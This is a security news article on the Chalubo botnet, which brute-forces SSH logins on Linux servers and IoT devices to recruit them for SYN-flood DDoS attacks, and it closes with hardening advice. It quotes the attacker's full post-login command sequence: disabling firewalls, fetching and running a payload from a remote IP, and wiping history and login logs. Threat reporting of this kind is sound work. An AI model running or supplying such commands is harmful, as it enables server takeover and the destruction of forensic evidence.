Saturday, November 2, 2024
HomeBotnetChalubo Botnet Compromise Your Server or IoT Device & Use it for...

Chalubo Botnet Compromise Your Server or IoT Device & Use it for DDOS Attack

Published on

Malware protection

Newly Discovered Chalubo Botnet that compromises the internet facing SSH servers on Linux-based systems, IOT Devices and uses it for Distributed denial-of-service attack.

Malware author using various evasion technique and more common windows malware principals to prevent from detection tools and also it adopted the anti analyzing technique to make it analyzing difficult.

Researchers believe that the Chalubo Botnet campaign started since August 2018 and it used 3 main components that have been retrieved for from victims device by executing the command from an attacker.

- Advertisement - SIEM as a Service

Downloader, the main bot, Lua command script, In this case, the main bot ran only on systems with an x86 processor architecture.

Here Attacker encrypts both the main bot component and its corresponding Lua script using the ChaCha stream cipher.

Also You can Take DDoS Protection Bootcamp – Free Training Course to Improve Your DDoS Protection Skills.

Chalubo Botnet Attack Process

Researchers from Sophos Initially discovered the Chalubo Botnet from their honeypot and identified that the bot attempting to brute force login credentials against an SSH server.

Honeypot was open to accepting various attack with a wide range of credentials based brute force attack and researchers have learned that the attackers using a combination of root:admin to gain a shell.

Later attackers issued the following command once the accessed the server where they are using a layered approach to dropping malicious components, but the encryption used isn’t one that we typically see with Linux malware.

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/
chmod 777 /usr/bin/libsdes
nohup /usr/bin/libsdes > /dev/null 2>&1 &
export HISTFILE=/dev/null
rm -f /var/log/wtmp
history -c

Later the Downloader using one of the functions from Mirai Botnet and create an empty file to prevent multiple occurrences of the malware from executing and moving into the encryption process and drops the main bot.

After analyzing the main bot, researchers identified that Chalubo had copied a few code snippets from Mirai.

According to Sophos,” the bot’s Lua script communicates with the C2 server to receive further instructions. Its purpose is to download, decrypt, then execute whatever Lua script it finds.
The Lua retrieved by the bots we tested trigger the bot to perform a SYN flood attack against a single Chinese IP address over port 10100, without masking the local source IP. Interestingly it checks the /24 address of the local IP against 23.247.2.0, and if it is in that range, then it will set the source IP to one within the 183.131.206.0/24 range.”

This Bot mainly using the common username and password combinations against SSH servers.

An organization should always ensure and focus on maximum Protection level for enterprise networks and you can try a free trial to Stop DDoS Attack in 10 Seconds. Also, Check Your Company’s DDOS Attack Downtime Cost.

“Recommend that sysadmins of SSH servers (including embedded devices) change any default passwords on those devices, because the brute force attempts to cycle through common, publicly known default passwords. “

If possible, it’s preferable to use SSH keys instead of passwords for logins. As with any machine, make sure to keep the system updated!

Also Read:

Stop DDoS Attacks In 10 Seconds – Organization’s Most Important Consideration for DDOS Attack Mitigation

DDoS Attack Prevention Method on Your Enterprise’s Systems – A Detailed Report

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

ATPC Cyber Forum to Focus on Next Generation Cybersecurity and Artificial Intelligence Issues

White House National Cyber Director, CEOs, Key Financial Services Companies, Congressional and Executive Branch...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Konni APT Hackers Attacking Organizations with New Spear-Phishing Tactics

The notorious Konni Advanced Persistent Threat (APT) group has intensified its cyber assault on...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Notorious WrnRAT Delivered Mimic As Gambling Games

WrnRAT is a new malware attack that cybercriminals have deployed by using popular gambling...